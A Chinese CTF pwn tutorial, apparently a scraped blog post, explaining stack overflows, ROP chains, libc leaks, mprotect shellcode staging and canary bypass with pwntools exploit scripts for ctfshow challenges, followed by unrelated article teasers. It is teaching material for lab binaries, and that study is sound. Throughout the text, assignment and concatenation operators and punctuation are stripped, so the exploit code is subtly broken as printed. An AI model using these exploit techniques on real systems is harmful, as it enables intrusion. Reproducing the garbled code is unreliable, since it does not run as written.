当前位置: 首页 > article >正文

【CTF | pwn篇】从栈溢出到ROP:ctfshow pwn实战技巧精讲

1. 栈溢出基础从零开始理解漏洞利用栈溢出是PWN领域最经典的漏洞类型之一也是CTF比赛中出现频率最高的题型。我们先从一个最简单的例子开始看看如何利用栈溢出漏洞控制程序执行流程。1.1 栈的结构与函数调用当程序调用函数时会在栈上分配空间用于存储局部变量、保存返回地址等。典型的32位程序栈帧结构如下高地址 ----------------- | 参数n | | ... | | 参数1 | ----------------- | 返回地址 | -- EIP将跳转到这里 ----------------- | 保存的EBP | -- 当前EBP指向这里 ----------------- | 局部变量 | | ... | 低地址在x86架构中栈是从高地址向低地址增长的。当函数返回时会从栈上弹出返回地址并跳转到该地址继续执行。1.2 最简单的栈溢出利用让我们看一个ctfshow上的实际例子(pwn_035)void vulnerable_function() { char buf[100]; gets(buf); // 危险函数不检查输入长度 }使用checksec检查程序保护机制checksec --filepwn_035输出显示这是一个32位程序只开启了NX保护栈不可执行。这意味着我们不能直接在栈上执行shellcode但可以通过覆盖返回地址来控制程序流程。1.3 计算溢出偏移量要成功利用栈溢出我们需要精确计算从缓冲区开始到返回地址的偏移量。常用方法有使用cyclic模式字符串通过调试器观察静态分析IDA反汇编代码以pwn_035为例通过IDA可以看到buf相对于EBP的偏移是0x6c加上4字节的保存EBP所以返回地址的偏移是0x6c 0x04 0x70。1.4 构造利用payload假设程序中有一个后门函数backdoor()地址是0x08048586我们可以构造如下payloadfrom pwn import * payload bA * 0x70 # 填充缓冲区 payload p32(0x08048586) # 覆盖返回地址这样当函数返回时就会跳转到后门函数执行。2. 进阶技巧ROP链的构造与应用当程序中没有现成的后门函数时我们需要使用更高级的技术——ROP(Return-Oriented Programming)。2.1 ROP基本原理ROP利用程序中已有的代码片段(gadget)通过精心构造的栈布局将这些片段串联起来实现任意代码执行。每个gadget以ret指令结束程序控制流就像在返回导向的编程。2.2 寻找和组合gadget常用的gadget类型包括pop reg; ret用于设置寄存器值mov [reg], reg; ret用于内存写入add/sub reg, reg; ret用于算术运算使用工具查找gadgetROPgadget --binary pwn_0362.3 实际案例pwn_036分析这是一个没有后门函数的32位程序但提供了system()和/bin/sh字符串。我们需要控制EIP跳转到system()设置栈帧使system()的参数是/bin/sh的地址构造ROP链from pwn import * system_plt 0x080483A0 binsh_addr 0x08048750 offset 0x6c 0x04 payload bA * offset payload p32(system_plt) payload p32(0xdeadbeef) # 伪造的返回地址 payload p32(binsh_addr) # system的参数2.4 64位程序的ROP特点64位程序与32位的主要区别在于参数传递方式前六个参数通过寄存器传递(RDI, RSI, RDX, RCX, R8, R9)需要找到pop rdi; ret这样的gadget来设置参数例如pwn_038的利用pop_rdi 0x4007e3 system_plt 0x400520 binsh 0x400808 payload bA * (0x20 8) payload p64(pop_rdi) payload p64(binsh) payload p64(system_plt)3. 绕过保护机制实战技巧现代程序通常会启用各种保护机制我们需要掌握相应的绕过技巧。3.1 绕过NX(栈不可执行)当栈不可执行时我们有几种选择使用ROP技术使用mprotect()将栈改为可执行使用已有的可执行内存区域pwn_049展示了如何使用mprotectmprotect_plt 0x0806CDD0 read_plt 0x0806BEE0 bss 0x080DB000 payload bA * offset payload p32(mprotect_plt) payload p32(pop3_ret) payload p32(bss) # 地址 payload p32(0x1000) # 大小 payload p32(0x7) # PROT_READ|PROT_WRITE|PROT_EXEC payload p32(read_plt) payload p32(pop3_ret) payload p32(0) # stdin payload p32(bss) # buf payload p32(0x100) # size payload p32(bss) # 跳转到shellcode3.2 处理ASLR(地址随机化)当程序启用ASLR时我们需要先泄漏某个函数的真实地址然后计算libc基址# 泄漏puts地址 payload bA * offset payload p32(puts_plt) payload p32(main_addr) # 返回到main函数再次利用 payload p32(puts_got) # 接收泄漏的地址 puts_addr u32(p.recv(4)) libc_base puts_addr - libc.sym[puts] system_addr libc_base libc.sym[system]3.3 绕过Stack CanaryStack Canary是防止栈溢出的保护机制常见绕过方法包括泄漏canary值覆盖__stack_chk_fail的GOT表不触发canary检查如只覆盖局部变量4. 高级技巧特殊场景下的漏洞利用4.1 格式化字符串漏洞结合利用有些题目会同时存在栈溢出和格式化字符串漏洞可以组合利用# 先用格式化字符串泄漏栈地址 payload b%p. * 20 p.sendline(payload) leak p.recv().split(b.) stack_addr int(leak[5], 16) # 然后用栈溢出构造ROP链 payload bA * offset payload p32(system_addr) payload p32(0) payload p32(stack_addr offset_to_binsh)4.2 堆栈结合利用当栈空间不足时可以考虑将ROP链或shellcode放在堆上# 在堆上布置ROP链 heap_addr 0x0804B000 payload p32(system_addr) p32(0) p32(binsh_addr) # 通过栈溢出跳转到堆 rop_chain [ pop_eax, heap_addr, jmp_eax ]4.3 利用文件操作获取flag有些题目不提供shell而是直接读取flag文件。这时可以构造ROP链调用open/read/write# 32位示例 rop_chain [ pop3_ret, 0x804b000, # buf 0x100, # size 0, # fd (stdin) read_plt, pop3_ret, 0x804b000, # filename 0, # flags 0, # mode open_plt, pop3_ret, 3, # fd 0x804b100, # buf 0x100, # count read_plt, pop3_ret, 1, # fd (stdout) 0x804b100, # buf 0x100, # count write_plt ]5. 实用工具与调试技巧5.1 常用工具介绍pwntoolsPython库提供了开发exploit所需的各种功能ROPgadget查找二进制文件中的gadgetchecksec检查二进制文件的保护机制GDB with peda/gef/pwndbg强大的调试工具one_gadget查找libc中的execve(/bin/sh) gadget5.2 GDB调试技巧调试栈溢出时常用的GDB命令# 设置断点 b *vulnerable_function20 # 查看栈内容 x/40wx $esp # 查看寄存器 info registers # 查看内存映射 vmmap # 跟踪执行 ni (next instruction) si (step into)5.3 pwntools实用技巧# 自动计算偏移 io process(./pwn) elf ELF(./pwn) rop ROP(elf) # 自动构建ROP链 rop.call(system, [next(elf.search(b/bin/sh))]) payload flat({offset: rop.chain()}) # 自动化泄漏 def leak_addr(addr): payload fmtstr_payload(offset, {addr: %s}, write_sizebyte) io.sendline(payload) return u64(io.recv(8))6. ctfshow题目实战分析6.1 pwn_045无system和/bin/sh的32位程序这道题既没有提供system函数也没有/bin/sh字符串。我们需要使用write泄漏libc地址计算libc基址获取system和/bin/sh地址构造ROP链from pwn import * context(archi386, oslinux) io process(./pwn_045) elf ELF(./pwn_045) libc ELF(/lib/i386-linux-gnu/libc.so.6) # 第一次溢出泄漏libc地址 rop1 ROP(elf) rop1.write(1, elf.got[write], 4) rop1.call(elf.sym[main]) payload1 bA*(0x6c4) rop1.chain() io.sendline(payload1) write_addr u32(io.recv(4)) libc.address write_addr - libc.sym[write] # 第二次溢出获取shell rop2 ROP([elf, libc]) rop2.system(next(libc.search(b/bin/sh))) payload2 bA*(0x6c4) rop2.chain() io.sendline(payload2) io.interactive()6.2 pwn_05064位程序与栈对齐问题64位程序中有时需要考虑栈对齐问题。当system崩溃时可以尝试添加ret gadget进行对齐# 找到ret gadget ret 0x4004fe rop ROP(elf) rop.raw(ret) # 栈对齐 rop.call(libc.sym[system], [bin_sh_addr])6.3 pwn_051非常规溢出点这道题通过字符串处理函数实现溢出关键点是输入特定字符会被替换为更长字符串利用这种扩展实现溢出# I会被替换为IronMan从而扩展输入长度 payload bI*16 # 实际会扩展为更长的字符串 payload p32(backdoor_addr)7. 从CTF到实战思维训练CTF题目往往简化了真实场景但培养的思维方式是通用的信息收集检查保护机制、分析二进制结构、寻找敏感函数漏洞定位识别危险函数、分析输入点、确定溢出长度利用开发根据保护机制选择合适的利用技术稳定利用考虑各种边界情况确保exploit稳定可靠在实际漏洞利用中还需要考虑不同环境下的地址差异漏洞触发条件的稳定性利用失败后的恢复机制多阶段利用的可靠性8. 持续学习建议要成为PWN高手建议系统学习计算机体系结构特别是栈、堆的内存布局深入理解调用约定和ABI规范熟悉常见保护机制的原理和绕过方法定期参加CTF比赛积累经验研究真实世界的漏洞利用案例参与开源安全项目如kernel exploit开发一些推荐的学习资源《漏洞利用开发实战》《CTF竞赛权威指南》LiveOverflow的YouTube频道ROP Emporium挑战系列

相关文章:

【CTF | pwn篇】从栈溢出到ROP:ctfshow pwn实战技巧精讲

1. 栈溢出基础:从零开始理解漏洞利用 栈溢出是PWN领域最经典的漏洞类型之一,也是CTF比赛中出现频率最高的题型。我们先从一个最简单的例子开始,看看如何利用栈溢出漏洞控制程序执行流程。 1.1 栈的结构与函数调用 当程序调用函数时&#xff0…...

别再只盯着model.score()了!Python机器学习模型评估的5种实用方法对比

超越model.score():Python机器学习模型评估的五大实战工具 当你的机器学习模型在测试集上表现不佳时,model.score()给出的单一数值往往无法揭示问题的全貌。就像医生不能仅凭体温判断病情一样,数据科学家也需要更丰富的诊断工具来全面评估模型…...

FlowState Lab参数调优实战:如何获得理想的模拟精度与速度

FlowState Lab参数调优实战:如何获得理想的模拟精度与速度 1. 为什么参数调优如此重要 在工程仿真领域,我们常常面临一个经典难题:精度与速度的权衡。FlowState Lab作为一款强大的流体动力学仿真工具,其参数设置直接影响着模拟结…...

Go HTTP Server 性能分析与优化

Go HTTP Server 性能分析与优化 在当今高并发的互联网应用中,HTTP Server的性能直接决定了用户体验和系统稳定性。Go语言凭借其轻量级协程和高效的网络库,成为构建高性能HTTP服务的首选之一。即使使用Go,开发者仍需深入分析性能瓶颈并进行针…...

Display Driver Uninstaller完全指南:解决显卡驱动残留的系统级清理方案

Display Driver Uninstaller完全指南:解决显卡驱动残留的系统级清理方案 【免费下载链接】display-drivers-uninstaller Display Driver Uninstaller (DDU) a driver removal utility / cleaner utility 项目地址: https://gitcode.com/gh_mirrors/di/display-dri…...

Qwen3-VL-2B为何选CPU优化?低门槛部署实战解读

Qwen3-VL-2B为何选CPU优化?低门槛部署实战解读 1. 引言:让AI看懂图片,其实很简单 你有没有想过,让AI像人一样“看懂”一张图片,到底需要多高的门槛? 过去,这通常意味着你需要一台价格不菲的、…...

深入解析CAN总线通信原理与CANoe实战开发指南

1. CAN总线通信原理深度剖析 CAN总线(Controller Area Network)是现代汽车电子系统中不可或缺的神经脉络。我第一次接触CAN总线是在2013年参与某新能源车项目时,当时就被它精巧的设计所震撼。与常见的串口通信不同,CAN采用差分信号…...

如何快速掌握Mesa:Python多智能体建模的完整指南

如何快速掌握Mesa:Python多智能体建模的完整指南 【免费下载链接】mesa Mesa is an open-source Python library for agent-based modeling, ideal for simulating complex systems and exploring emergent behaviors. 项目地址: https://gitcode.com/gh_mirrors/…...

Qwen3Guard-Gen-8B真实案例:如何用AI模型自动拦截不当言论

Qwen3Guard-Gen-8B真实案例:如何用AI模型自动拦截不当言论 1. 引言:内容安全的新挑战 在数字内容爆炸式增长的今天,各类平台都面临着内容审核的巨大压力。传统的关键词过滤和规则匹配系统已经难以应对日益复杂的网络环境,特别是…...

5分钟搞定AI超清画质增强:镜像部署与使用全攻略

5分钟搞定AI超清画质增强:镜像部署与使用全攻略 1. 引言:为什么需要AI画质增强 1.1 低清图像的普遍困扰 我们每天都会遇到各种低质量图片:模糊的老照片、压缩过度的网络图片、分辨率不足的截图。传统放大方法就像简单拉伸橡皮筋&#xff0…...

扩散薛定谔桥(Diffusion Schrödinger Bridge)

扩散薛定谔桥(Diffusion Schrdinger Bridge) 1. 概述 扩散薛定谔桥(Diffusion Schrdinger Bridge, DSB)是一类在两个端点分布之间学习随机过渡动力学的方法。其核心目标不是仅恢复终点样本,而是构造一条满足边界约束…...

告别‘翻老课本’:用SHOT和NRC搞定Source-Free Domain Adaptation,附PyTorch代码解读

实战解析SFDA:SHOT与NRC的PyTorch实现与调优指南 当你在医疗影像分析项目中训练好的模型需要迁移到另一家医院时,却被告知无法共享原始数据——这就是Source-Free Domain Adaptation(SFDA)要解决的核心问题。作为算法工程师&#…...

无代码玩转OpenClaw:nanobot镜像图形化配置自动化流程

无代码玩转OpenClaw:nanobot镜像图形化配置自动化流程 1. 为什么选择图形化配置OpenClaw 作为一个长期与技术打交道的开发者,我最初接触OpenClaw时也被它的命令行配置方式劝退过。直到发现了nanobot这个超轻量级镜像,才真正体会到"无代…...

深度测评:2026年最值得拥有的专业降AI率工具

2026年论文降AI率工具已从“基础修改”升级为智能化、多维度的学术合规解决方案,核心评价维度涵盖AIGC识别精度、文本自然度、文献真实性、格式合规性、查重适配性及多语言支持。本次测评涵盖6款主流工具,覆盖中英文写作、全流程与专项优化、免费与付费模…...

Ubuntu系统下识别错误文件格式的解决方案:从JPEG报错到实际文件类型检测

1. 当Ubuntu告诉你"这不是JPEG文件"时发生了什么 那天我正在处理用户上传的图片,突然发现一个诡异现象:同一张"111.jpg"在Windows系统显示正常,但在Ubuntu服务器上却报错"Error interpreting JPEG image file (Not …...

3步掌握WebPShop插件:让Photoshop完美支持WebP格式图片处理 [特殊字符]

3步掌握WebPShop插件:让Photoshop完美支持WebP格式图片处理 🚀 【免费下载链接】WebPShop Photoshop plug-in for opening and saving WebP images 项目地址: https://gitcode.com/gh_mirrors/we/WebPShop WebPShop是一款专为Adobe Photoshop设计…...

Echarts 数据大屏实战:150套模板助力企业级可视化开发

1. 为什么企业需要Echarts数据大屏? 在数字化转型的浪潮中,数据可视化已经成为企业决策的重要工具。想象一下,当你的老板需要在3秒内了解公司当月销售情况、用户增长趋势和库存状态时,密密麻麻的Excel表格显然不是最佳选择。这时…...

从零掌握HunterPie:解锁《怪物猎人:世界》狩猎效率的实战指南

从零掌握HunterPie:解锁《怪物猎人:世界》狩猎效率的实战指南 【免费下载链接】HunterPie-legacy A complete, modern and clean overlay with Discord Rich Presence integration for Monster Hunter: World. 项目地址: https://gitcode.com/gh_mirro…...

PasteMD解决办公痛点:快速格式化OCR文字和网页复制内容

PasteMD解决办公痛点:快速格式化OCR文字和网页复制内容 1. 为什么我们需要智能文本格式化工具 在日常办公中,我们经常遇到这样的场景:会议结束后,手写的笔记拍成照片OCR识别后变成一堆杂乱无章的文本;从网页复制的技术…...

隐马尔科夫模型(HMM)实战:从天气预测到股票市场分析

1. 隐马尔科夫模型入门:从天气预报说起 第一次听说隐马尔科夫模型(HMM)时,我正盯着手机上的天气预报发呆。为什么明明显示"晴天",下午却突然下起暴雨?这让我开始思考天气预测背后的数学模型。HMM正是解决这类问题的利器…...

Ostrakon-VL-8B效果展示:AI识别货架商品、检查消防通道真实案例

Ostrakon-VL-8B效果展示:AI识别货架商品、检查消防通道真实案例 1. 零售行业的视觉智能革命 走进任何一家超市或餐厅,你都会看到员工忙碌地进行各种检查:商品是否摆放整齐、货架是否需要补货、消防通道是否畅通。这些看似简单的工作&#x…...

从iRMB到EMO:构建下一代轻量级密集预测模型的统一架构解析

1. 从iRMB到EMO:轻量级密集预测模型的进化之路 当我们在手机上使用人脸解锁功能,或是用修图软件一键抠图时,背后都离不开密集预测模型的支撑。这类模型需要处理图像中每个像素点的信息,传统方案要么计算量太大,要么精度…...

React Native PagerView入门指南:5分钟快速搭建页面切换组件

React Native PagerView入门指南:5分钟快速搭建页面切换组件 【免费下载链接】react-native-pager-view React Native wrapper for the Android ViewPager and iOS UIPageViewController. 项目地址: https://gitcode.com/gh_mirrors/re/react-native-pager-view …...

Face3D.ai Pro效果展示:不同光照条件下正面人像的3D几何还原精度对比

Face3D.ai Pro效果展示:不同光照条件下正面人像的3D几何还原精度对比 1. 为什么光照条件对3D人脸重建如此关键 你有没有试过用手机拍一张自拍,结果发现鼻子一侧发亮、另一侧几乎全黑?或者在窗边拍照时,额头反光刺眼,…...

FlyEnv-安装使用摸索记录

下载 官网地址:https://www.macphpstudy.com/zh/ 进入github下载,也可以百度网盘下载。 下载完后进行安装,我是选择为当前用户安装,没有为所有用户安装。 进入页面进行需要安装的软件;看上去还是有蛮多的&#xff0c…...

Video2X AI视频增强实用指南:零基础掌握高效画质提升解决方案

Video2X AI视频增强实用指南:零基础掌握高效画质提升解决方案 【免费下载链接】video2x A lossless video/GIF/image upscaler achieved with waifu2x, Anime4K, SRMD and RealSR. Started in Hack the Valley II, 2018. 项目地址: https://gitcode.com/GitHub_Tr…...

OpCore-Simplify:零代码黑苹果配置终极指南,让硬件适配从复杂到简单的蜕变

OpCore-Simplify:零代码黑苹果配置终极指南,让硬件适配从复杂到简单的蜕变 【免费下载链接】OpCore-Simplify A tool designed to simplify the creation of OpenCore EFI 项目地址: https://gitcode.com/GitHub_Trending/op/OpCore-Simplify 对于…...

深入ProtoBuf编译:从Google.Protobuf.dll到Protoc.exe的完整实践指南

1. ProtoBuf基础与编译环境搭建 Protocol Buffers(简称ProtoBuf)是Google开发的一种高效数据序列化工具。我第一次接触ProtoBuf是在处理微服务通信时,当时被它比JSON快3-5倍的序列化速度震惊了。简单来说,ProtoBuf就像是个智能的数…...

常量和常量表达式1

一、基础定义(C/C通用核心定义) 1. 常量(Constant) 程序整个生命周期内值不可修改、固定不变的量,是值的实体(单个固定值/命名固定值),其值的确定时机可在编译期/预处理期&#xff0…...

Phi-3-vision-128k-instruct创意编程:用JavaScript构建交互式图像故事生成器

Phi-3-vision-128k-instruct创意编程:用JavaScript构建交互式图像故事生成器 1. 引言:当AI创意遇上前端交互 想象这样一个场景:用户上传一张随手拍的照片,通过简单的滑块调整和风格选择,几秒钟后就能获得一个与图片内…...